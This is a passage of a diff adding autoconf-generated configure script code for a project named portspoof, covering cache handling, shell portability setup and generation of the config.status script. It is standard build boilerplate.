+( + for ac_var in `(set) 2>&1 | sed -n 's/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'`; do + eval ac_val=\$$ac_var + case $ac_val in #( + *${as_nl}*) + case $ac_var in #( + *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 +$as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; + esac + case $ac_var in #( + _ | IFS | as_nl) ;; #( + BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( + *) { eval $ac_var=; unset $ac_var;} ;; + esac ;; + esac + done + + (set) 2>&1 | + case $as_nl`(ac_space=' '; set) 2>&1` in #( + *${as_nl}ac_space=\ *) + # `set' does not quote correctly, so add quotes: double-quote + # substitution turns \\\\ into \\, and sed turns \\ into \. + sed -n \ + "s/'/'\\\\''/g; + s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\\2'/p" + ;; #( + *) + # `set' quotes correctly as required by POSIX, so do not add quotes. + sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" + ;; + esac | + sort +) | + sed ' + /^ac_cv_env_/b end + t clear + :clear + s/^\([^=]*\)=\(.*[{}].*\)$/test "${\1+set}" = set || &/ + t end + s/^\([^=]*\)=\(.*\)$/\1=${\1=\2}/ + :end' >>confcache +if diff "$cache_file" confcache >/dev/null 2>&1; then :; else + if test -w "$cache_file"; then + test "x$cache_file" != "x/dev/null" && + { $as_echo "$as_me:${as_lineno-$LINENO}: updating cache $cache_file" >&5 +$as_echo "$as_me: updating cache $cache_file" >&6;} + cat confcache >$cache_file + else + { $as_echo "$as_me:${as_lineno-$LINENO}: not updating unwritable cache $cache_file" >&5 +$as_echo "$as_me: not updating unwritable cache $cache_file" >&6;} + fi +fi +rm -f confcache + +test "x$prefix" = xNONE && prefix=$ac_default_prefix +# Let make expand exec_prefix. +test "x$exec_prefix" = xNONE && exec_prefix='${prefix}' + +DEFS=-DHAVE_CONFIG_H + +ac_libobjs= +ac_ltlibobjs= +for ac_i in : $LIB@&t@OBJS; do test "x$ac_i" = x: && continue + # 1. Remove the extension, and $U if already installed. + ac_script='s/\$U\././;s/\.o$//;s/\.obj$//' + ac_i=`$as_echo "$ac_i" | sed "$ac_script"` + # 2. Prepend LIBOBJDIR. When used with automake>=1.10 LIBOBJDIR + # will be set to the directory where LIBOBJS objects are built. + as_fn_append ac_libobjs " \${LIBOBJDIR}$ac_i\$U.$ac_objext" + as_fn_append ac_ltlibobjs " \${LIBOBJDIR}$ac_i"'$U.lo' +done +LIB@&t@OBJS=$ac_libobjs + +LTLIBOBJS=$ac_ltlibobjs + + + if test -n "$EXEEXT"; then + am__EXEEXT_TRUE= + am__EXEEXT_FALSE='#' +else + am__EXEEXT_TRUE='#' + am__EXEEXT_FALSE= +fi + +if test -z "${AMDEP_TRUE}" && test -z "${AMDEP_FALSE}"; then + as_fn_error "conditional \"AMDEP\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 +fi +if test -z "${am__fastdepCXX_TRUE}" && test -z "${am__fastdepCXX_FALSE}"; then + as_fn_error "conditional \"am__fastdepCXX\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 +fi +if test -z "${am__fastdepCC_TRUE}" && test -z "${am__fastdepCC_FALSE}"; then + as_fn_error "conditional \"am__fastdepCC\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 +fi + +: ${CONFIG_STATUS=./config.status} +ac_write_fail=0 +ac_clean_files_save=$ac_clean_files +ac_clean_files="$ac_clean_files $CONFIG_STATUS" +{ $as_echo "$as_me:${as_lineno-$LINENO}: creating $CONFIG_STATUS" >&5 +$as_echo "$as_me: creating $CONFIG_STATUS" >&6;} +as_write_fail=0 +cat >$CONFIG_STATUS <<_ASEOF || as_write_fail=1 +#! $SHELL +# Generated by $as_me. +# Run this file to recreate the current configuration. +# Compiler output produced by configure, useful for debugging +# configure, is in config.log if it exists. + +debug=false +ac_cs_recheck=false +ac_cs_silent=false + +SHELL=\${CONFIG_SHELL-$SHELL} +export SHELL +_ASEOF +cat >>$CONFIG_STATUS <<\_ASEOF || as_write_fail=1 +## -------------------- ## +## M4sh Initialization. ## +## -------------------- ## + +# Be more Bourne compatible +DUALCASE=1; export DUALCASE # for MKS sh +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : + emulate sh + NULLCMD=: + # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which + # is contrary to our usage. Disable this feature. + alias -g '${1+"$@"}'='"$@"' + setopt NO_GLOB_SUBST +else + case `(set -o) 2>/dev/null` in @%:@( + *posix*) : + set -o posix ;; @%:@( + *) : + ;; +esac +fi + + +as_nl=' +' +export as_nl +# Printing a long string crashes Solaris 7 /usr/bin/printf. +as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo +# Prefer a ksh shell builtin over an external printf program on Solaris, +# but without wasting forks for bash or zsh. +if test -z "$BASH_VERSION$ZSH_VERSION" \ + && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='print -r --' + as_echo_n='print -rn --' +elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='printf %s\n' + as_echo_n='printf %s' +else + if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then + as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' + as_echo_n='/usr/ucb/echo -n' + else + as_echo_body='eval expr "X$1" : "X\\(.*\\)"' + as_echo_n_body='eval + arg=$1; + case $arg in @%:@( + *"$as_nl"*) + expr "X$arg" : "X\\(.*\\)$as_nl"; + arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; + esac; + expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" + ' + export as_echo_n_body + as_echo_n='sh -c $as_echo_n_body as_echo' + fi + export as_echo_body + as_echo='sh -c $as_echo_body as_echo' +fi + +# The user is always right. +if test "${PATH_SEPARATOR+set}" != set; then + PATH_SEPARATOR=: + (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { + (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || + PATH_SEPARATOR=';' + } +fi + + +# IFS +# We need space, tab and new line, in precisely that order. Quoting is +# there to prevent editors from complaining about space-tab. +# (If _AS_PATH_WALK were called with IFS unset, it would disable word +# splitting by setting IFS to empty value.) +IFS=" "" $as_nl" + +# Find who we are. Look in the path if we contain no directory separator. +case $0 in @%:@(( + *[\\/]* ) as_myself=$0 ;; + *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break + done +IFS=$as_save_IFS + + ;; +esac +# We did not find ourselves, most probably we were run as `sh COMMAND' +# in which case we are not to be found in the path. +if test "x$as_myself" = x; then + as_myself=$0 +fi +if test ! -f "$as_myself"; then + $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 + exit 1 +fi + +# Unset variables that we do not need and which cause bugs (e.g. in +# pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" +# suppresses any "Segmentation fault" message there. '((' could +# trigger a bug in pdksh 5.2.14. +for as_var in BASH_ENV ENV MAIL MAILPATH +do eval test x\${$as_var+set} = xset \ + && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : +done +PS1='$ ' +PS2='> ' +PS4='+ ' + +# NLS nuisances. +LC_ALL=C +export LC_ALL +LANGUAGE=C +export LANGUAGE + +# CDPATH. +(unset CDPATH) >/dev/null 2>&1 && unset CDPATH + + +@%:@ as_fn_error ERROR [LINENO LOG_FD] +@%:@ --------------------------------- +@%:@ Output "`basename @S|@0`: error: ERROR" to stderr. If LINENO and LOG_FD are +@%:@ provided, also output the error to LOG_FD, referencing LINENO. Then exit the +@%:@ script with status @S|@?, using 1 if that was 0. +as_fn_error () +{ + as_status=$?; test $as_status -eq 0 && as_status=1 + if test "$3"; then + as_lineno=${as_lineno-"$2"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + $as_echo "$as_me:${as_lineno-$LINENO}: error: $1" >&$3 + fi + $as_echo "$as_me: error: $1" >&2 + as_fn_exit $as_status +} @%:@ as_fn_error + + +@%:@ as_fn_set_status STATUS +@%:@ ----------------------- +@%:@ Set @S|@? to STATUS, without forking. +as_fn_set_status () +{ + return $1 +} @%:@ as_fn_set_status + +@%:@ as_fn_exit STATUS +@%:@ ----------------- +@%:@ Exit the shell with STATUS, even in a "trap 0" or "set -e" context. +as_fn_exit () +{ + set +e + as_fn_set_status $1 + exit $1 +} @%:@ as_fn_exit + +@%:@ as_fn_unset VAR +@%:@ --------------- +@%:@ Portably unset VAR. +as_fn_unset () +{ + { eval $1=; unset $1;} +} +as_unset=as_fn_unset +@%:@ as_fn_append VAR VALUE +@%:@ ---------------------- +@%:@ Append the text in VALUE to the end of the definition contained in VAR. Take +@%:@ advantage of any shell optimizations that allow amortized linear growth over +@%:@ repeated appends, instead of the typical quadratic growth present in naive +@%:@ implementations. +if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : + eval 'as_fn_append () + { + eval $1+=\$2 + }' +else + as_fn_append () + { + eval $1=\$$1\$2 + } +fi # as_fn_append + +@%:@ as_fn_arith ARG... +@%:@ ------------------ +@%:@ Perform arithmetic evaluation on the ARGs, and store the result in the +@%:@ global @S|@as_val. Take advantage of shells that can avoid forks. The arguments +@%:@ must be portable across @S|@(()) and expr. +if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : + eval 'as_fn_arith () + { + as_val=$(( $* )) + }' +else + as_fn_arith () + { + as_val=`expr "$@" || test $? -eq 1` + } +fi # as_fn_arith + + +if expr a : '\(a\)' >/dev/null 2>&1 && + test "X`expr 00001 : '.*\(...\)'`" = X001; then + as_expr=expr +else + as_expr=false +fi + +if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then + as_basename=basename +else + as_basename=false +fi + +if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then + as_dirname=dirname +else + as_dirname=false +fi + +as_me=`$as_basename -- "$0" || +$as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ + X"$0" : 'X\(//\)$' \| \ + X"$0" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X/"$0" | + sed '/^.*\/\([^/][^/]*\)\/*$/{ + s//\1/ + q + } + /^X\/\(\/\/\)$/{ + s//\1/ + q + } + /^X\/\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits + +ECHO_C= ECHO_N= ECHO_T= +case `echo -n x` in @%:@((((( +-n*) + case `echo 'xy\c'` in + *c*) ECHO_T=' ';; # ECHO_T is single tab character. + xy) ECHO_C='\c';; + *) echo `echo ksh88 bug on AIX 6.1` > /dev/null + ECHO_T=' ';; + esac;; +*) + ECHO_N='-n';; +esac + +rm -f conf$$ conf$$.exe conf$$.file +if test -d conf$$.dir; then + rm -f conf$$.dir/conf$$.file +else + rm -f conf$$.dir + mkdir conf$$.dir 2>/dev/null +fi +if (echo >conf$$.file) 2>/dev/null; then + if ln -s conf$$.file conf$$ 2>/dev/null; then + as_ln_s='ln -s' + # ... but there are two gotchas: + # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. + # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. + # In both cases, we have to default to `cp -p'. + ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || + as_ln_s='cp -p' + elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln + else + as_ln_s='cp -p' + fi +else + as_ln_s='cp -p' +fi +rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file +rmdir conf$$.dir 2>/dev/null + + +@%:@ as_fn_mkdir_p +@%:@ ------------- +@%:@ Create "@S|@as_dir" as a directory, including parents if necessary. +as_fn_mkdir_p () +{ + + case $as_dir in #( + -*) as_dir=./$as_dir;; + esac + test -d "$as_dir" || eval $as_mkdir_p || { + as_dirs= + while :; do + case $as_dir in #( + *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( + *) as_qdir=$as_dir;; + esac + as_dirs="'$as_qdir' $as_dirs" + as_dir=`$as_dirname -- "$as_dir" || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + test -d "$as_dir" && break + done + test -z "$as_dirs" || eval "mkdir $as_dirs" + } || test -d "$as_dir" || as_fn_error "cannot create directory $as_dir" + + +} @%:@ as_fn_mkdir_p +if mkdir -p . 2>/dev/null; then + as_mkdir_p='mkdir -p "$as_dir"' +else + test -d ./-p && rmdir ./-p + as_mkdir_p=false +fi + +if test -x / >/dev/null 2>&1; then + as_test_x='test -x' +else + if ls -dL / >/dev/null 2>&1; then + as_ls_L_option=L + else + as_ls_L_option= + fi + as_test_x=' + eval sh -c '\'' + if test -d "$1"; then + test -d "$1/."; + else + case $1 in @%:@( + -*)set "./$1";; + esac; + case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in @%:@(( + ???[sx]*):;;*)false;;esac;fi + '\'' sh + ' +fi +as_executable_p=$as_test_x + +# Sed expression to map a string onto a valid CPP name. +as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" + +# Sed expression to map a string onto a valid variable name. +as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" + + +exec 6>&1 +## ----------------------------------- ## +## Main body of $CONFIG_STATUS script. ## +## ----------------------------------- ## +_ASEOF +test $as_write_fail = 0 && chmod +x $CONFIG_STATUS || ac_write_fail=1 + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# Save the log message, to keep $0 and so on meaningful, and to +# report actual input values of CONFIG_FILES etc. instead of their +# values after options handling. +ac_log=" +This file was extended by portspoof $as_me 1.0, which was +generated by GNU Autoconf 2.65. Invocation command line was + + CONFIG_FILES = $CONFIG_FILES + CONFIG_HEADERS = $CONFIG_HEADERS + CONFIG_LINKS = $CONFIG_LINKS + CONFIG_COMMANDS = $CONFIG_COMMANDS + $ $0 $@ + +on `(hostname || uname -n) 2>/dev/null | sed 1q` +" + +_ACEOF + +case $ac_config_files in *" +"*) set x $ac_config_files; shift; ac_config_files=$*;; +esac + +case $ac_config_headers in *" +"*) set x $ac_config_headers; shift; ac_config_headers=$*;; +esac + + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +# Files that config.status was made for. +config_files="$ac_config_files" +config_headers="$ac_config_headers" +config_commands="$ac_config_commands" + +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +ac_cs_usage="\ +\`$as_me' instantiates files and other configuration actions +from templates according to the current configuration. Unless the files +and actions are specified as TAGs, all are instantiated by default. + +Usage: $0 [OPTION]... [TAG]... + + -h, --help print this help, then exit + -V, --version print version number and configuration settings, then exit + --config print configuration, then exit + -q, --quiet, --silent + do not print progress messages + -d, --debug don't remove temporary files + --recheck update $as_me by reconfiguring in the same conditions + --file=FILE[:TEMPLATE] + instantiate the configuration file FILE + --header=FILE[:TEMPLATE] + instantiate the configuration header FILE + +Configuration files: +$config_files + +Configuration headers: +$config_headers + +Configuration commands: +$config_commands + +Report bugs to ." + +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`" +ac_cs_version="\\ +portspoof config.status 1.0 +configured by $0, generated by GNU Autoconf 2.65, + with options \\"\$ac_cs_config\\" + +Copyright (C) 2009 Free Software Foundation, Inc. +This config.status script is free software; the Free Software Foundation +gives unlimited permission to copy, distribute and modify it." + +ac_pwd='$ac_pwd' +srcdir='$srcdir' +INSTALL='$INSTALL' +MKDIR_P='$MKDIR_P' +AWK='$AWK' +test -n "\$AWK" || AWK=awk +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# The default lists apply if the user does not specify any file. +ac_need_defaults=: +while test $# != 0 +do + case $1 in + --*=*) + ac_option=`expr "X$1" : 'X\([^=]*\)='` + ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'` + ac_shift=: + ;; + *) + ac_option=$1 + ac_optarg=$2 + ac_shift=shift + ;; + esac + + case $ac_option in + # Handling of the options. + -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) + ac_cs_recheck=: ;; + --version | --versio | --versi | --vers | --ver | --ve | --v | -V ) + $as_echo "$ac_cs_version"; exit ;; + --config | --confi | --conf | --con | --co | --c ) + $as_echo "$ac_cs_config"; exit ;; + --debug | --debu | --deb | --de | --d | -d ) + debug=: ;; + --file | --fil | --fi | --f ) + $ac_shift + case $ac_optarg in + *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + as_fn_append CONFIG_FILES " '$ac_optarg'" + ac_need_defaults=false;; + --header | --heade | --head | --hea ) + $ac_shift + case $ac_optarg in + *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + as_fn_append CONFIG_HEADERS " '$ac_optarg'" + ac_need_defaults=false;; + --he | --h) + # Conflict between --help and --header + as_fn_error "ambiguous option: \`$1' +Try \`$0 --help' for more information.";; + --help | --hel | -h ) + $as_echo "$ac_cs_usage"; exit ;; + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil | --si | --s) + ac_cs_silent=: ;; + + # This is an error. + -*) as_fn_error "unrecognized option: \`$1' +Try \`$0 --help' for more information." ;; + + *) as_fn_append ac_config_targets " $1" + ac_need_defaults=false ;; + + esac + shift +done + +ac_configure_extra_args= + +if $ac_cs_silent; then + exec 6>/dev/null + ac_configure_extra_args="$ac_configure_extra_args --silent" +fi + +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +if \$ac_cs_recheck; then + set X '$SHELL' '$0' $ac_configure_args \$ac_configure_extra_args --no-create --no-recursion + shift + \$as_echo "running CONFIG_SHELL=$SHELL \$*" >&6 + CONFIG_SHELL='$SHELL' + export CONFIG_SHELL + exec "\$@" +fi + +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +exec 5>>config.log +{ + echo + sed 'h;s/./-/g;s/^.../@%:@@%:@ /;s/...$/ @%:@@%:@/;p;x;p;x' <<_ASBOX +@%:@@%:@ Running $as_me. @%:@@%:@ +_ASBOX + $as_echo "$ac_log" +} >&5 + +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +# +# INIT-COMMANDS +# +AMDEP_TRUE="$AMDEP_TRUE" ac_aux_dir="$ac_aux_dir" + +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 + +# Handling of arguments. +for ac_config_target in $ac_config_targets +do + case $ac_config_target in + "src/config.h") CONFIG_HEADERS="$CONFIG_HEADERS src/config.h" ;; + "depfiles") CONFIG_COMMANDS="$CONFIG_COMMANDS depfiles" ;; + "Makefile") CONFIG_FILES="$CONFIG_FILES Makefile" ;; + "src/Makefile") CONFIG_FILES="$CONFIG_FILES src/Makefile" ;; + "tools/Makefile") CONFIG_FILES="$CONFIG_FILES tools/Makefile" ;; + + *) as_fn_error "invalid argument: \`$ac_config_target'" "$LINENO" 5;; + esac +done + + +# If the user did not use the arguments to specify the items to instantiate, +# then the envvar interface is used. Set only those that are not. +# We use the long form for the default assignment because of an extremely +# bizarre bug on SunOS 4.1.3. +if $ac_need_defaults; then + test "${CONFIG_FILES+set}" = set || CONFIG_FILES=$config_files + test "${CONFIG_HEADERS+set}" = set || CONFIG_HEADERS=$config_headers + test "${CONFIG_COMMANDS+set}" = set || CONFIG_COMMANDS=$config_commands +fi + +# Have a temporary directory for convenience. Make it in the build tree +# simply because there is no reason against having it here, and in addition, +# creating and moving files from /tmp can sometimes cause problems. +# Hook for its removal unless debugging. +# Note that there is a small window in which the directory will not be cleaned: +# after its creation but before its name has been assigned to `$tmp'. +$debug || +{ + tmp= + trap 'exit_status=$? + { test -z "$tmp" || test ! -d "$tmp" || rm -fr "$tmp"; } && exit $exit_status +' 0 + trap 'as_fn_exit 1' 1 2 13 15 +} +# Create a (secure) tmp directory for tmp files. + +{ + tmp=`(umask 077 && mktemp -d "./confXXXXXX") 2>/dev/null` && + test -n "$tmp" && test -d "$tmp" +} || +{ + tmp=./conf$$-$RANDOM + (umask 077 && mkdir "$tmp") +} || as_fn_error "cannot create a temporary directory in ." "$LINENO" 5 + +# Set up the scripts for CONFIG_FILES section. +# No need to generate them if there are no CONFIG_FILES. +# This happens for instance with `./config.status config.h'. +if test -n "$CONFIG_FILES"; then + + +ac_cr=`echo X | tr X '\015'` +# On cygwin, bash can eat \r inside `` if the user requested igncr. +# But we know of no other shell where ac_cr would be empty at this +# point, so we can use a bashism as a fallback. +if test "x$ac_cr" = x; then + eval ac_cr=\$\'\\r\' +fi +ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' /dev/null` +if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then + ac_cs_awk_cr='\r' +else + ac_cs_awk_cr=$ac_cr +fi + +echo 'BEGIN {' >"$tmp/subs1.awk" && +_ACEOF + + +{ + echo "cat >conf$$subs.awk <<_ACEOF" && + echo "$ac_subst_vars" | sed 's/.*/&!$&$ac_delim/' && + echo "_ACEOF" +} >conf$$subs.sh || + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 +ac_delim_num=`echo "$ac_subst_vars" | grep -c '$'` +ac_delim='%!_!# ' +for ac_last_try in false false false false false :; do + . ./conf$$subs.sh || + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 + + ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X` + if test $ac_delim_n = $ac_delim_num; then + break + elif $ac_last_try; then + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 + else + ac_delim="$ac_delim!$ac_delim _$ac_delim!! " + fi +done +rm -f conf$$subs.sh + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +cat >>"\$tmp/subs1.awk" <<\\_ACAWK && +_ACEOF +sed -n ' +h +s/^/S["/; s/!.*/"]=/ +p +g +s/^[^!]*!// +:repl +t repl +s/'"$ac_delim"'$// +t delim +:nl +h +s/\(.\{148\}\)..*/\1/ +t more1 +s/["\\]/\\&/g; s/^/"/; s/$/\\n"\\/ +p +n +b repl +:more1 +s/["\\]/\\&/g; s/^/"/; s/$/"\\/ +p +g +s/.\{148\}// +t nl +:delim +h +s/\(.\{148\}\)..*/\1/ +t more2 +s/["\\]/\\&/g; s/^/"/; s/$/"/ +p +b +:more2 +s/["\\]/\\&/g; s/^/"/; s/$/"\\/ +p +g +s/.\{148\}// +t delim +' >$CONFIG_STATUS || ac_write_fail=1 +rm -f conf$$subs.awk +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +_ACAWK +cat >>"\$tmp/subs1.awk" <<_ACAWK && + for (key in S) S_is_set[key] = 1 + FS = "" + +} +{ + line = $ 0 + nfields = split(line, field, "@") + substed = 0 + len = length(field[1]) + for (i = 2; i < nfields; i++) { + key = field[i] + keylen = length(key) + if (S_is_set[key]) { + value = S[key] + line = substr(line, 1, len) "" value "" substr(line, len + keylen + 3) + len += length(value) + length(field[++i]) + substed = 1 + } else + len += 1 + keylen + } + + print line +} + +_ACAWK +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +if sed "s/$ac_cr//" < /dev/null > /dev/null 2>&1; then + sed "s/$ac_cr\$//; s/$ac_cr/$ac_cs_awk_cr/g" +else + cat +fi < "$tmp/subs1.awk" > "$tmp/subs.awk" \ + || as_fn_error "could not setup config files machinery" "$LINENO" 5 +_ACEOF + +# VPATH may cause trouble with some makes, so we remove $(srcdir), +# ${srcdir} and @srcdir@ from VPATH if srcdir is ".", strip leading and +# trailing colons and then remove the whole line if VPATH becomes empty +# (actually we leave an empty line to preserve line numbers). +if test "x$srcdir" = x.; then + ac_vpsub='/^[ ]*VPATH[ ]*=/{ +s/:*\$(srcdir):*/:/ +s/:*\${srcdir}:*/:/ +s/:*@srcdir@:*/:/ +s/^\([^=]*=[ ]*\):*/\1/ +s/:*$// +s/^[^=]*=[ ]*$// +}' +fi + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +fi # test -n "$CONFIG_FILES" + +# Set up the scripts for CONFIG_HEADERS section. +# No need to generate them if there are no CONFIG_HEADERS. +# This happens for instance with `./config.status Makefile'. +if test -n "$CONFIG_HEADERS"; then +cat >"$tmp/defines.awk" <<\_ACAWK || +BEGIN { +_ACEOF + +# Transform confdefs.h into an awk script `defines.awk', embedded as +# here-document in config.status, that substitutes the proper values into +# config.h.in to produce config.h. + +# Create a delimiter string that does not exist in confdefs.h, to ease +# handling of long lines. +ac_delim='%!_!# ' +for ac_last_try in false false :; do + ac_t=`sed -n "/$ac_delim/p" confdefs.h` + if test -z "$ac_t"; then + break + elif $ac_last_try; then + as_fn_error "could not make $CONFIG_HEADERS" "$LINENO" 5 + else + ac_delim="$ac_delim!$ac_delim _$ac_delim!! " + fi +done + +# For the awk script, D is an array of macro values keyed by name, +# likewise P contains macro parameters if any. Preserve backslash +# newline sequences. + +ac_word_re=[_$as_cr_Letters][_$as_cr_alnum]* +sed -n ' +s/.\{148\}/&'"$ac_delim"'/g +t rset +:rset +s/^[ ]*#[ ]*define[ ][ ]*/ / +t def +d +:def +s/\\$// +t bsnl +s/["\\]/\\&/g +s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ +D["\1"]=" \3"/p +s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2"/p +d +:bsnl +s/["\\]/\\&/g +s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ +D["\1"]=" \3\\\\\\n"\\/p +t cont +s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2\\\\\\n"\\/p +t cont +d +:cont +n +s/.\{148\}/&'"$ac_delim"'/g +t clear +:clear +s/\\$// +t bsnlc +s/["\\]/\\&/g; s/^/"/; s/$/"/p +d +:bsnlc +s/["\\]/\\&/g; s/^/"/; s/$/\\\\\\n"\\/p +b cont +' >$CONFIG_STATUS || ac_write_fail=1 + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 + for (key in D) D_is_set[key] = 1 + FS = "" +} +/^[\t ]*#[\t ]*(define|undef)[\t ]+$ac_word_re([\t (]|\$)/ { + line = \$ 0 + split(line, arg, " ") + if (arg[1] == "#") { + defundef = arg[2] + mac1 = arg[3] + } else { + defundef = substr(arg[1], 2) + mac1 = arg[2] + } + split(mac1, mac2, "(") #) + macro = mac2[1] + prefix = substr(line, 1, index(line, defundef) - 1) + if (D_is_set[macro]) { + # Preserve the white space surrounding the "#". + print prefix "define", macro P[macro] D[macro] + next + } else { + # Replace #undef with comments. This is necessary, for example, + # in the case of _POSIX_SOURCE, which is predefined and required + # on some systems where configure will not decide to define it. + if (defundef == "undef") { + print "/*", prefix defundef, macro, "*/" + next + } + } +} +{ print } +_ACAWK +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 + as_fn_error "could not setup config headers machinery" "$LINENO" 5 +fi # test -n "$CONFIG_HEADERS" + + +eval set X " :F $CONFIG_FILES :H $CONFIG_HEADERS :C $CONFIG_COMMANDS" +shift +for ac_tag +do + case $ac_tag in + :[FHLC]) ac_mode=$ac_tag; continue;; + esac + case $ac_mode$ac_tag in + :[FHL]*:*);; + :L* | :C*:*) as_fn_error "invalid tag \`$ac_tag'" "$LINENO" 5;; + :[FH]-) ac_tag=-:-;; + :[FH]*) ac_tag=$ac_tag:$ac_tag.in;; + esac + ac_save_IFS=$IFS + IFS=: + set x $ac_tag + IFS=$ac_save_IFS + shift + ac_file=$1 + shift + + case $ac_mode in + :L) ac_source=$1;; + :[FH]) + ac_file_inputs= + for ac_f + do + case $ac_f in + -) ac_f="$tmp/stdin";; + *) # Look for the file first in the build tree, then in the source tree + # (if the path is not absolute). The absolute path cannot be DOS-style, + # because $ac_f cannot contain `:'. + test -f "$ac_f" || + case $ac_f 